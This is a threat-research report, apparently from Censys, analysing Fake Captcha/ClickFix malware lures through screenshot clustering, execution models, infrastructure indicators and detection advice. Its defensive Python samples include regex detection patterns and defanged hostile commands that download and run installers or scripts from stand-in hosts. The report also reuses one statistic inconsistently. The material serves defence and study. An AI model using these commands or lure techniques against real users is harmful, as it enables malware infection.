Executive Summary

- The Fake Captcha ecosystem can look like a monolithic, coordinated campaign, but it is better understood as a fragmented, fast-changing abuse pattern that uses trusted web infrastructure as the delivery surface.

- Perceptual hashing (pHash) across thousands of Fake Captcha pages observed in the Censys dataset identifies one dominant visual cluster, closely resembling legitimate Cloudflare-style verification challenges.

- Visual uniformity is not behavioral uniformity. Inside that single cluster are mutually incompatible delivery models, including clipboard-driven execution (PowerShell, VBScript), installer-based delivery (MSI), and server-driven push-style frameworks that expose no client-side execution artifacts.

- Defender takeaway: visual similarity and user interaction are not reliable for attribution or scoping. Fake Captcha is no longer a tactic tied to a specific malware family or actor. It functions as a standardized interaction layer that decouples initial trust abuse from downstream execution.

- This aligns with a broader shift toward Living Off the Web: systematic reuse of security-themed interfaces, platform-sanctioned workflows, and conditioned user behavior to deliver malware. Attackers do not need to compromise trusted services; they inherit trust by operating inside familiar verification and browser workflows that users and tooling are trained to accept.

Introduction





Over the past several years, Fake Captcha and “ClickFix” style lures have become a persistent feature of web-based malware delivery. These pages imitate legitimate verification challenges and instruct users to complete a task framed as browser verification, access validation, or security remediation. Early reporting correctly characterized this as social engineering, often culminating in the victim running a malicious command that the page had copied to the clipboard, so that victims effectively infect themselves.

Subsequent research showed that Fake Captcha pages are frequently embedded within broader injection and redirection frameworks, functioning as a late-stage conversion step rather than an initial access vector.

As Fake Captcha activity scaled, an ambiguity emerged. Pages with near-identical appearance began appearing across thousands of assets. This raised a natural question: does visual uniformity reflect coordinated ownership, shared tooling, or simply reuse of a successful interface?

This report is motivated by that ambiguity. Rather than analyzing a single campaign or malware family, it examines Fake Captcha as an ecosystem. Using visual clustering at internet scale, it evaluates how lures are constructed, reused, and deployed across the web, and how much operational meaning can be inferred from appearance alone.

Dataset and Methodology

This analysis reflects Censys’ internet-wide perspective on web-based threats, derived from continuous observation of exposed web properties and infrastructure. Rather than relying on isolated samples or anecdotal campaigns, it is grounded in a curated dataset of Fake Captcha activity tracked through the Censys platform and associated threat hunting workflows.



At the time of analysis, Censys was actively tracking 9,494 distinct assets exhibiting Fake Captcha behavior. These assets include both standalone malicious properties and compromised websites where Fake Captcha pages were injected into otherwise legitimate content. This collection is maintained within the Censys Threat Hunting module, where Fake Captcha is treated as a persistent and evolving web-native threat category rather than a single campaign.



Data Collection and Enrichment

To support large-scale analysis, all assets in the Fake Captcha Collection were exported using the Censys Platform API. Each asset was enriched to retrieve the full “view” associated with the host or web property (collectively referred to as assets). This custom enrichment workflow provided access to complete HTML bodies, embedded scripts, and client-side logic required to extract clipboard commands, identify execution mechanisms, and trace follow-on deployment behavior.

Static metadata alone was insufficient. Many Fake Captcha implementations rely on dynamically generated JavaScript, obfuscated command construction, or late-stage interaction logic that is only visible when the page is rendered. As a result, the analysis focused on observing pages as users encounter them.

Rendering and Screenshot Capture

Each enriched asset was visited using a headless browser built on Playwright, configured to impersonate a standard Windows desktop environment. Pages were rendered in a contained sandbox to prevent follow-on execution while still allowing client-side logic to run as intended.

After rendering, a screenshot was captured. These screenshots served as the basis for visual analysis and clustering. Rendering-based capture was chosen over HTML-only approaches to preserve the visual structure, layout, branding cues, and interface elements that define Fake Captcha lures.
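The rendering step can be sketched roughly as follows. This is a minimal illustration using Playwright's Python sync API, not the pipeline used for this research. The user agent string, viewport size, timeout, and the `capture` and `screenshot_name` helpers are all assumptions made for the example. The snippet provides no containment of its own, so it should only be run inside an isolated analysis environment.

```python
import hashlib
from pathlib import Path

# Assumed values for illustration; the report does not state the exact profile used.
WINDOWS_UA = (
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
)
VIEWPORT = {"width": 1366, "height": 768}


def screenshot_name(url: str) -> str:
    """Derive a stable file name from the URL (hypothetical naming scheme)."""
    return hashlib.sha256(url.encode("utf-8")).hexdigest()[:16] + ".png"


def capture(url: str, out_dir: str, timeout_ms: int = 15000) -> Path:
    """Render a page headlessly with a Windows-like profile and save a screenshot."""
    # Imported lazily so the helpers above work without Playwright installed.
    from playwright.sync_api import sync_playwright

    target_dir = Path(out_dir)
    target_dir.mkdir(parents=True, exist_ok=True)
    target = target_dir / screenshot_name(url)

    with sync_playwright() as p:
        browser = p.chromium.launch(headless=True)
        try:
            context = browser.new_context(
                user_agent=WINDOWS_UA,
                viewport=VIEWPORT,
                locale="en-US",
                accept_downloads=False,  # do not keep follow-on files
            )
            page = context.new_page()
            # Let client-side logic run before capturing what the user would see.
            page.goto(url, wait_until="networkidle", timeout=timeout_ms)
            page.screenshot(path=str(target), full_page=False)
        finally:
            browser.close()
    return target
```

A call such as `capture("https://example.invalid/", "shots")` would write one PNG per URL. Pages that fingerprint headless browsers may still serve benign content to a setup like this.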



Visual Fingerprinting With Perceptual Hashing

For each screenshot, a perceptual hash (pHash) was computed. Unlike cryptographic hashes, perceptual hashing produces similar outputs for images that appear visually alike, even when minor changes such as resizing, compression, or localized branding are present. This makes pHash well suited for identifying reused or standardized lures that vary slightly across deployments.

New pHashes were compared against existing hashes in the dataset. If a matching hash existed, the asset was linked to the corresponding visual cluster. If not, a new cluster was created. To account for near-matches rather than exact equality, comparisons used Hamming distance, which counts the bits that differ between two hashes. After experimentation, a Hamming distance threshold of six provided the best balance between sensitivity and specificity, grouping visually equivalent pages while preserving separation between distinct lure designs.
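The assignment logic described above can be sketched in a few lines. This is an illustrative reconstruction rather than the code used in the analysis. It assumes 64-bit pHashes supplied as hex strings (for example, as produced by a library such as ImageHash), compares each new hash against the first hash seen in each cluster, and treats a distance of six or less as a match. The choice of representative and the inclusive threshold are assumptions.

```python
from typing import List

THRESHOLD = 6  # Hamming distance threshold reported in the text


def hamming(a: int, b: int) -> int:
    """Count the bits that differ between two integer-encoded hashes."""
    return bin(a ^ b).count("1")


def assign_clusters(hex_hashes: List[str], threshold: int = THRESHOLD) -> List[int]:
    """Greedy clustering: join the first cluster within the threshold, else open a new one."""
    representatives: List[int] = []  # first hash observed for each cluster (assumption)
    labels: List[int] = []
    for hex_hash in hex_hashes:
        value = int(hex_hash, 16)
        for cluster_id, rep in enumerate(representatives):
            if hamming(value, rep) <= threshold:
                labels.append(cluster_id)
                break
        else:
            # No existing cluster was close enough, so start a new one.
            representatives.append(value)
            labels.append(len(representatives) - 1)
    return labels


# Made-up hashes purely for demonstration.
example = [
    "ffffffffffffffff",  # opens cluster 0
    "fffffffffffffff0",  # 4 bits from cluster 0, joins it
    "0000000000000000",  # far from cluster 0, opens cluster 1
    "000000000000007f",  # 7 bits from cluster 1, opens cluster 2
]
print(assign_clusters(example))  # [0, 0, 1, 2]
```

Because assignment is greedy, the result depends on the order in which hashes arrive, which is one reason to validate the threshold against manually reviewed screenshots.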

Why Screenshots Instead of HTML Hashing?

Alternative approaches such as hashing HTML bodies (for example, using TLSH) were considered but were not suitable for this analysis. In many cases, Fake Captcha content is injected into highly diverse and unrelated websites. The surrounding HTML varies dramatically between assets even when the visible lure is functionally identical.

HTML-based hashing tends to cluster by site structure rather than by the attacker-controlled interface. For Fake Captcha, the primary control surface is the rendered user experience. Screenshot-based perceptual hashing captures what users actually see and interact with.

Methodological Scope and Limitations

This methodology is designed to answer questions about interface reuse, visual standardization, and delivery diversity at scale. It is effective for identifying dominant lure patterns and examining how identical interfaces can support different execution models.

It is not an attribution mechanism. Visual similarity does not imply shared infrastructure, shared payloads, or shared operators. Where possible, visual clustering is supplemented with execution analysis, infrastructure mapping, and payload inspection to avoid over-interpretation.

Render-based analysis also has inherent limitations. Of the tracked assets, 1,748 (19.90% of total) could not be visually confirmed at the time of analysis. Some failed to respond or threw errors, while others fingerprinted headless browser environments or conditionally served benign content to analysis visits. These behaviors can produce incomplete rendering, misleading screenshots, or missed artifacts. Visual clustering should be treated as a lower-bound representation of observed Fake Captcha activity rather than a complete census.

Despite these blind spots, visual clustering remains a practical analytic tool. It measures what users are intended to see rather than how pages are implemented, enabling ecosystem-level analysis of social engineering interfaces that are difficult to capture through static techniques.

Together, these methods provide a defensible foundation for understanding the Fake Captcha ecosystem as it exists across the public web.

The Fake Captcha Visual Landscape

At scale, the Fake Captcha landscape presents a mix of familiarity and variation that can make unrelated activity appear coordinated. Verification prompts, browser checks, and security interstitials are now routine web experiences. That familiarity is central to Fake Captcha’s effectiveness. Users have been trained to accept friction in the name of safety and to comply with instructions presented as security checks.



Visual clustering shows this trust is exploited in multiple ways. Some lures directly imitate well-known verification experiences, most commonly Cloudflare-style challenges. The branding, layout, and language are immediately recognizable, lowering suspicion and accelerating compliance.

This does not imply misuse of Cloudflare infrastructure. It reflects the reuse of widely recognized security interfaces as templates. Technical accuracy matters less than whether the experience feels familiar.

This trend coincides with the broader shift toward social engineering by threat actors over the last decade, which has included abuse of other well-known and trusted platforms and brands. Examples include FedEx, DHL, or UPS themes used in phishing lures, and malware delivery landing pages masquerading as Microsoft products such as Office 365, SharePoint, and OneDrive. The more familiar a brand or interface is, the more likely it is to be abused.

The key difference with Living Off the Web is the object of abuse:

- Traditional Social Engineering: Abuses the brand trust of a known entity (e.g., Microsoft, FedEx) to facilitate a malicious action (e.g., providing credentials, downloading a file). The attacker imitates the trusted entity.

- Living Off the Web: Abuses the functional trust of a common, standardized web interaction (e.g., a Captcha, a browser notification request, a security interstitial) that has been normalized by platforms. The attacker repurposes the trusted workflow itself.

In both cases, trust is the primary attack vector. However, Living Off the Web demonstrates a shift from brand imitation to interaction convention abuse, making the threat less reliant on specific vendor branding and more focused on the universal language of web security and verification.

Beyond dominant branded patterns, the ecosystem includes a long tail of smaller, visually coherent clusters. These often use generic language such as “Please wait while we verify your browser” or “Checking your connection.” Some diverge with inverted color schemes, simplified layouts, or minimal interface elements. Others appear partially broken, with missing logos or layout artifacts caused by faulty code or blocked resources.

The key point is not that Fake Captcha varies. It is that visual similarity is easy to manufacture, and visual variation can be incidental. Appearance alone is a weak signal for operational structure. The sections that follow move from what users see to what the infrastructure and execution paths reveal.



Visual Cluster 0: Dominance and Uniformity

Clusters of screenshots were generated and given sequential numbers. Of these clusters, Visual Cluster 0 stands out due to its scale and consistency. At the time of analysis, 6,686 of the 9,494 tracked Fake Captcha endpoints were associated with this single cluster, representing approximately 70% of the observed landscape. No other visual cluster approaches this level of prevalence.

Cluster 0 closely resembles a generic Cloudflare-style verification challenge. Layout, typography, language, and implied interaction flow are immediately familiar. A common characteristic is incorporation of site-specific favicons. In many cases, the favicon of the compromised or hosting site is embedded into the verification page, likely to reinforce legitimacy.

This personalization often produces artifacts. Favicons are frequently stretched or misaligned, creating subtle inconsistencies that may be visible to trained observers. The broader structure remains familiar enough that most users are unlikely to register these flaws as meaningful.

Given its size and uniformity, it would be natural to assume Cluster 0 represents a single campaign, shared toolkit, or coordinated activity cluster. That assumption does not hold. Cluster 0 is unified at the interface layer and fragmented everywhere else.

Beneath the Interface: Execution Models in Cluster 0

Cluster 0 appears uniform by design. After interaction, the cohesion collapses.





Of the 6,686 endpoints associated with Cluster 0, execution or follow-on behavior could be reliably extracted from 5,441 assets, representing 85.6% coverage. Within those assets, 32 distinct payload variants were identified across multiple fundamentally different execution models.

This level of behavioral diversity is incompatible with the assumption of a single operator. These are not interchangeable implementation details. They represent different operational strategies and different control planes.

Clipboard-Driven Client Execution



VBScript Downloaders (1,706 assets)

VBScript remains the most prevalent clipboard-driven technique in Cluster 0. Commands construct a VBScript loader inline, retrieve a remote script, and execute it using Windows-native components.

Representative example:



PowerShell DownloadFile (1,269 assets)

PowerShell loaders commonly use Net.WebClient.DownloadFile to retrieve and execute follow-on scripts, often with minimal obfuscation and optional cleanup logic.

Representative example:



Obfuscated PowerShell (252 assets)

Some operators employ lightweight obfuscation, reconstructing commands at runtime from concatenated strings, character arrays, or encoded content.

Representative example:

Other Clipboard-Based Techniques (low volume)

Lower-frequency approaches include BAT downloaders, URL-encoded MSHTA execution, and base64-encoded PowerShell launchers.



Installer-Based Delivery via MSIEXEC (1,212 assets)

A distinct execution model relies on Windows Installer packages, bypassing scripting engines entirely.

Representative example:

MSI payloads are hosted across numerous compromised domains, typically within paths themed around verification or human checks. This shifts execution into different security surfaces than script-driven delivery.





Server-Driven Push-Based C2 (Matrix Push) (1,281 assets)

Not all Cluster 0 activity includes clipboard execution.

In these cases, interaction triggers a form submission to a Matrix Push C2 endpoint with no visible command or static payload reference exposed client-side.

Representative example:

This model relocates delivery and execution control entirely server-side. The Fake Captcha interface becomes an initiation surface rather than a payload-disclosure step.

Breaking the Visual Illusion

These execution models represent incompatible operational choices. The presence of all of them behind a single visually uniform lure demonstrates that appearance and behavior have become decoupled. Cluster 0 is unified at the interface layer and fragmented across delivery pipelines, infrastructure pools, and control planes.

That disconnect is central to understanding how Fake Captcha has evolved and why visual similarity is no longer a reliable proxy for shared operation.
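One way to make this split concrete is to bucket extracted clipboard commands by execution model. The sketch below is a hypothetical rule set written for illustration. The regular expressions, labels, and sample strings are assumptions, not the signatures used in this research, and real commands are often obfuscated enough to need deobfuscation first.

```python
import re
from collections import Counter
from typing import Optional

# Ordered rules: the first matching pattern wins. All patterns are illustrative.
RULES = [
    ("msi_installer", re.compile(r"\bmsiexec(?:\.exe)?\b", re.I)),
    ("mshta", re.compile(r"\bmshta(?:\.exe)?\b", re.I)),
    ("vbscript_downloader", re.compile(r"\b(?:wscript|cscript)(?:\.exe)?\b|\.vbs\b", re.I)),
    ("powershell_encoded",
     re.compile(r"\bpowershell\b.*\s-(?:e|ec|enc|encodedcommand)\s", re.I | re.S)),
    ("powershell_downloadfile",
     re.compile(r"\bpowershell\b.*\bdownloadfile\b", re.I | re.S)),
    ("powershell_other", re.compile(r"\bpowershell\b", re.I)),
]


def classify(command: Optional[str]) -> str:
    """Map a clipboard command to a coarse execution-model label."""
    if not command or not command.strip():
        # Nothing on the clipboard, e.g. a server-driven push handoff.
        return "no_clipboard_command"
    for label, pattern in RULES:
        if pattern.search(command):
            return label
    return "unclassified"


# Defanged, made-up samples for demonstration only.
samples = [
    "msiexec /i hxxps://example[.]invalid/verify/check.msi /qn",
    "powershell -w hidden -c \"(New-Object Net.WebClient)"
    ".DownloadFile('hxxp://example[.]invalid/a.ps1','a.ps1')\"",
    r'cmd /c "echo placeholder > %TEMP%\v.vbs & wscript %TEMP%\v.vbs"',
    "powershell -nop -enc SQBFAFgA",
    None,
]
print(Counter(classify(s) for s in samples))
```

Tallying labels per visual cluster in this way shows at a glance whether a single lure design fronts more than one execution model.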



Matrix Push C2 and Server-Driven Delivery

Most Fake Captcha activity within Cluster 0 relies on clipboard-based execution. A substantial subset does not. Instead, it hands off to a server-driven workflow commonly referred to as Matrix Push C2, a framework publicly documented by BlackFog.



In this path, the Fake Captcha page is not a payload prompt. It is a conversion step. The objective is to get the user to grant browser notification permissions, most commonly in Chrome. Once permissions are granted, operators can push follow-on content later through the browser’s notification channel.

This changes what “delivery” looks like. There is no clipboard command. There is no immediate download. Static page capture can appear to contain no executable artifacts because the handoff is the artifact. The next stage is deferred and mediated through the browser platform itself.

In the Fake Captcha context, the page remains the trust-abusing interaction surface. After interaction, control is handed off to attacker infrastructure that prompts users to enable notifications. That permission becomes the delivery mechanism. From the outside, it can resemble a dead end. In reality, it is a channel being established.

This differs from traditional ClickFix in a fundamental way. ClickFix depends on explicit user execution and produces a discrete artifact at interaction time: a clipboard command, a script invocation, an installer download. Matrix Push removes that step. There is no immediately visible payload and no single file tied to the initial click. Initial access is fileless. Delivery is delayed and operator-controlled.

At first glance, these cases can look like a data gap. They are not. The absence of a payload is a property of the technique. Delivery is deferred and mediated through browser notification systems that are part of the trusted web platform. Static page capture reveals no executable content beyond the logic needed to obtain the permission grant. Clipboard inspection yields nothing. Artifact-centric payload collection pipelines fail silently.





Matrix Push C2 also clarifies a second point: in these cases, the lure itself appears to be generated by the Matrix infrastructure. The system is not only receiving notification opt-ins. It is providing an operator-facing template engine designed to manufacture the initial “verification” experience and route victims onward.

The kit’s own documentation describes a “REDIRECT – Website Integration” workflow: inject a script (Notifications.js) into the <head> of a website, show a Cloudflare-style verification page, prompt the user to click “Allow,” then redirect the visitor to a configured destination URL. The redirect is a feature. It preserves the illusion that the verification step was legitimate and keeps the victim moving while the notification channel is established.

Template selection is treated as configuration. The admin UI exposes a catalog of prebuilt pages, including Cloudflare-style verification variants, reCAPTCHA lookalikes, and brand-themed security prompts. The value is not malware specificity. The value is trust skinning. A single backend can rotate templates to match whatever context the operator wants to impersonate.

This workflow could be examined without crossing any authentication (or ethical) boundary. The /admin page loads a React single-page application whose JavaScript and CSS bundles were served as static assets and were retrievable directly by URL without credentials. Those publicly accessible front-end files were used to recreate the UI locally for feature inspection. This did not provide access to authenticated functions or server-side data. It reproduced only what the server was already publishing to any client: the template catalog, the redirect workflow, and the integration model centered on Notifications.js.

From a visual perspective, Matrix Push C2 pages can be indistinguishable from ClickFix-style Fake Captcha pages. They use the same Cloudflare-like layouts, the same language, and the same interaction cues. Visual clustering correctly groups them. Operationally, the paths diverge immediately.

Matrix Push C2 reinforces the broader theme in this report. The consistent artifact is not the malware family, the payload, or the infrastructure pool. It is the interface layer. Trust is inherited by operating inside web-normalized security UX that users are conditioned to accept: verification checks, “browser validation” interstitials, permission prompts, and redirect flows. The attacker does not need a browser exploit to move forward. The browser is the delivery surface.

For defenders, the implication is direct. Clipboard-focused detection and payload-centric analysis will miss entire classes of Fake Captcha abuse designed to avoid static artifacts at interaction time. Coverage needs to include the handoff: notification permission prompts, push subscription events, service worker registration, and subsequent notification traffic tied back to the lure origin and the push infrastructure.
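As a rough starting point for covering the handoff, page source can be checked for the standard browser APIs involved in notification opt-in. The sketch below is an assumption-laden illustration: it looks only for literal calls to `Notification.requestPermission`, `pushManager.subscribe`, and `serviceWorker.register`, and the `handoff_markers` helper and marker names are hypothetical. Obfuscated or dynamically loaded scripts will evade a static check like this, so runtime telemetry remains the stronger signal.

```python
import re
from typing import List

# Literal references to standard web platform APIs used for push opt-in.
MARKERS = {
    "notification_permission": re.compile(r"Notification\s*\.\s*requestPermission\s*\("),
    "push_subscription": re.compile(r"pushManager\s*\.\s*subscribe\s*\("),
    "service_worker": re.compile(r"serviceWorker\s*\.\s*register\s*\("),
}


def handoff_markers(source: str) -> List[str]:
    """Return the names of push-handoff markers found in HTML or JavaScript source."""
    return sorted(name for name, pattern in MARKERS.items() if pattern.search(source))


# Made-up page script for demonstration.
sample = """
navigator.serviceWorker.register('/sw.js').then(function (reg) {
  Notification.requestPermission().then(function (result) {
    if (result === 'granted') {
      reg.pushManager.subscribe({ userVisibleOnly: true });
    }
  });
});
"""
print(handoff_markers(sample))
# ['notification_permission', 'push_subscription', 'service_worker']
```

A page that matches a security-themed lure and also returns these markers, yet exposes no clipboard command, is a candidate for the server-driven path rather than a dead end.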

Infrastructure Reuse and Delivery Silos

Stage-2 infrastructure analysis does not collapse Cluster 0 into a single campaign. It reveals parallel delivery silos operating behind the same interface.

Infrastructure reuse is present but constrained. Reuse occurs within execution techniques, not across them. VBScript loaders, PowerShell downloaders, MSI delivery, and Matrix Push C2 each rely on distinct infrastructure pools with minimal overlap.

VBScript delivery is dominated by a small set of high-port servers such as 95[.]164.53.115:5506 and 78[.]40.209.164:5506. PowerShell delivery points to unrelated domains such as ghost.nestdns[.]com and penguinpublishers[.]org. MSI delivery relies on compromised domains hosting installer payloads under verification-themed paths. Matrix Push C2 stands apart entirely, relying on matrix[.]cymru and browser-mediated delivery.

This pattern indicates delivery specialization rather than centralized campaign control. The same Fake Captcha interface is reused across multiple independent execution pipelines, each with its own infrastructure, tooling, and tradecraft.
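The "reuse within techniques, not across them" observation can be checked by measuring overlap between the infrastructure pools of each execution model. The sketch below uses Jaccard similarity over sets of staging hosts. The pools contain only the example indicators named in this section (defanged), not the full dataset, and the MSI pool is omitted because no specific hosts are listed. The function names are hypothetical.

```python
from itertools import combinations
from typing import Dict, Set, Tuple

# Example indicators taken from the text above, defanged. Not a complete pool.
POOLS: Dict[str, Set[str]] = {
    "vbscript": {"95[.]164.53.115:5506", "78[.]40.209.164:5506"},
    "powershell": {"ghost.nestdns[.]com", "penguinpublishers[.]org"},
    "matrix_push": {"matrix[.]cymru"},
}


def jaccard(a: Set[str], b: Set[str]) -> float:
    """Shared hosts divided by all hosts across both pools (0.0 means no overlap)."""
    union = a | b
    return len(a & b) / len(union) if union else 0.0


def pairwise_overlap(pools: Dict[str, Set[str]]) -> Dict[Tuple[str, str], float]:
    """Compute Jaccard similarity for every pair of execution models."""
    return {
        (x, y): jaccard(pools[x], pools[y])
        for x, y in combinations(sorted(pools), 2)
    }


for pair, score in pairwise_overlap(POOLS).items():
    print(pair, score)
```

With the example indicators, every pair scores 0.0. On a full dataset, scores near zero across techniques alongside heavy reuse inside each technique would be consistent with parallel delivery silos.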

When Visual Clustering Fails

Visual clustering answers a narrow question: what does this look like to a user? It does not answer who operates it, how it delivers malware, or what infrastructure supports it.

In this dataset, visually identical pages supported multiple execution models, distinct staging infrastructure, both file-based and fileless delivery, and different payload families. These differences reflect incompatible operational choices. Treating visual sameness as a proxy for shared control obscures meaningful structure and creates false confidence.

This is the core failure mode. Appearance has become a commodity. The more successful a lure becomes, the less attribution value its appearance carries.

Visual clustering still has value when used correctly. It is effective for identifying dominant lure patterns, measuring reuse of interaction designs, and establishing user-facing trends at scale. It is misleading when used to define campaigns, infer shared infrastructure, or attribute activity.

Fake Captcha breaks traditional campaign assumptions. The interface has been decoupled from execution. A single visual pattern can front multiple delivery pipelines. In some cases, the interface persists while everything behind it changes. In others, backend infrastructure supports multiple visual expressions.

The unit of analysis must change. “Campaign” is no longer a default conclusion when the interface layer is shared, copied, or reused independently of the underlying operation.

Trust as the Interface Layer

The consistent artifact in Fake Captcha is not the malware family, the payload, or the infrastructure. It is the interface layer.

Attackers inherit trust by operating inside web-normalized security UX that users are trained to accept: verification checks, browser validation interstitials, notification prompts, and installer dialogs. That trust can be reused without compromising the trusted service being imitated.

Cluster 0 shows what that looks like at scale. One Cloudflare-like design fronts incompatible delivery models, distinct infrastructure pools, and different control planes, from clipboard-driven scripting and MSI delivery to server-driven push workflows that expose no client-side payload at interaction time.

The defender problem is not recognizing the lure. It is detecting the workflow abuse and the handoff that follows, even when the interface stays constant and everything behind it changes.

Implications for Detection and Defense

The Fake Captcha ecosystem highlights a mismatch between how web-based threats operate and how they are commonly detected and analyzed. Techniques that were once reliable signals now represent only a subset of modern delivery models.

Clipboard-Focused Detection Is Not Sufficient

Many detections focus on clipboard abuse, command-line execution, or scripting engines such as PowerShell and VBScript. These techniques remain prevalent, but they do not represent the full scope of the threat.

For instance, within a single primary lure (Cluster 0), we observed a mix of attack vectors, including clipboard-driven execution, installer-based delivery, and server-driven fileless delivery. Notably, only 85.6% of sites in Cluster 0 incorporated clipboard-related JavaScript.

Therefore, the absence of a clipboard payload should not be interpreted as an absence of malicious intent.

Payload-Centric Analysis Misses Server-Driven Models

Traditional workflows assume a discrete payload artifact that can be collected, detonated, and classified. Push-based and server-driven models break that assumption. No static payload is presented at interaction time. Delivery is deferred. Execution may occur through browser-mediated mechanisms.

Artifact-first pipelines bias detection toward older models and miss techniques designed to avoid static indicators.

What to Key On Instead

More durable signals sit at the interaction and context layer:

- Verification and security-themed interfaces appearing outside expected contexts

- Notification requests immediately following security-themed lures

- Repeated “human verification” or “browser check” flows tied to unrelated infrastructure

- Correlation between lure presence and downstream network behavior, even when execution is not explicit

Interface-level analysis is useful, but only when paired with execution and infrastructure context.

ACTIONABLE: Defenders should adopt a layered strategy: proactively block threats using data from the Censys Threat Hunting module, and implement user education and awareness training.

Rethink the Unit of Analysis

Defenders should expect one lure to front multiple delivery pipelines, and techniques to shift without any change to the interface. Clustering activity by execution and infrastructure, not appearance alone, better reflects how this ecosystem operates.
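A minimal sketch of that regrouping is shown below. It assumes each asset has already been annotated with a visual cluster, an execution model, and a staging host. The record fields, host names, and the `group_by_operation` helper are hypothetical and exist only to illustrate the idea.

```python
from collections import defaultdict
from typing import Dict, List, Tuple

# Hypothetical annotated records; every value here is a placeholder.
records = [
    {"asset": "site-a.invalid", "visual_cluster": 0,
     "execution_model": "vbscript", "staging_host": "stage-1.invalid"},
    {"asset": "site-b.invalid", "visual_cluster": 0,
     "execution_model": "vbscript", "staging_host": "stage-1.invalid"},
    {"asset": "site-c.invalid", "visual_cluster": 0,
     "execution_model": "msi", "staging_host": "stage-2.invalid"},
    {"asset": "site-d.invalid", "visual_cluster": 0,
     "execution_model": "push", "staging_host": "push-1.invalid"},
]


def group_by_operation(rows: List[dict]) -> Dict[Tuple[str, str], List[str]]:
    """Group assets by (execution model, staging host) instead of appearance."""
    groups: Dict[Tuple[str, str], List[str]] = defaultdict(list)
    for row in rows:
        key = (row["execution_model"], row["staging_host"])
        groups[key].append(row["asset"])
    return dict(groups)


for key, assets in group_by_operation(records).items():
    print(key, assets)
```

In this toy input, all four assets share one visual cluster but fall into three operational groups, which is the pattern the report describes for Cluster 0.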

Visibility Gaps Are Structural

Push-based delivery reduces visibility into timing and content delivered to individual users. Conditional serving, headless fingerprinting, and evasion further complicate measurement. These gaps are not analytic failures. They are properties of the threat model.

Censys: Closing the Artifact Gap With Screenshot-at-Fingerprint

This research relied on a purpose-built rendering pipeline to capture screenshots for visual clustering. That approach does not scale if it remains a one-off workflow. As a direct response to this research and the visibility gaps described above, Censys is integrating automatic screenshot capture into the platform: when a page fingerprints as Fake Captcha, it will render and capture a screenshot at observation time. This preserves the interface artifact even when pages are short-lived, conditionally served, or shift to server-driven and fileless delivery where no client-side payload is exposed. It turns an ephemeral interaction layer into durable evidence that can be clustered, reviewed, and tracked over time.

What Should Change After Reading This

Three adjustments follow directly from the evidence:

- Do not equate visual similarity with shared ownership.

- Treat trusted web interfaces as a first-class attack surface.

- Design detections that survive changes in execution technique.

Fake Captcha is optimizing for trust preservation. Detection strategies must evolve accordingly.

Conclusion and Future Work

This report examined Fake Captcha as an ecosystem rather than a collection of isolated incidents. What appears to be a single dominant campaign is better understood as a shared interface layer supporting multiple delivery models, infrastructure pools, and execution control planes.

The core finding is that visual uniformity has outpaced operational unity. The same Cloudflare-style verification interface can front clipboard-based delivery, installer-driven execution, and server-controlled fileless frameworks such as Matrix Push C2. The interface persists while everything behind it changes.

This decoupling changes how web-based malware delivery should be understood. Attackers no longer need end-to-end control. They reuse trusted interaction patterns that users, browsers, and defenders are conditioned to accept. Traditional indicators of compromise become optional.

Fake Captcha illustrates a broader transition toward Living Off the Web: systematic abuse of legitimate web interfaces, security conventions, and platform workflows as delivery mechanisms. In this environment, attackers need familiarity more than novelty.

Limitations and Open Questions

Push-based and fileless delivery limits visibility by design. Understanding payload lineage, timing, and impact requires telemetry beyond static capture. Environmental fingerprinting and conditional serving introduce blind spots that likely undercount activity. Infrastructure reuse suggests specialization and possible sharing, but the economic structure behind that reuse remains unclear.

These gaps reflect the threat model, not a failure of analysis.

Future Research Directions

Several factors suggest this model will expand. Defensive pressure has increased around scripting engines and static payload hosting. Server-driven and fileless models offer an alternative. Trusted interfaces scale globally. The approach shifts risk onto user trust, which is difficult to secure with technical controls. Economics favor reuse: a single interface can support multiple delivery models and operational goals.

Future work should focus on:

- Payload lineage and configuration analysis where infrastructure supports multiple delivery techniques

- Behavioral detection of trusted-interface abuse independent of execution method

- Longitudinal analysis of interface persistence versus backend churn

- Extending this methodology to other security-themed lures, trusted brand abuse, and verification workflows

Fake Captcha is a case study in how trust becomes weaponized at scale. Living Off the Web is not an edge case. It is the direction of travel.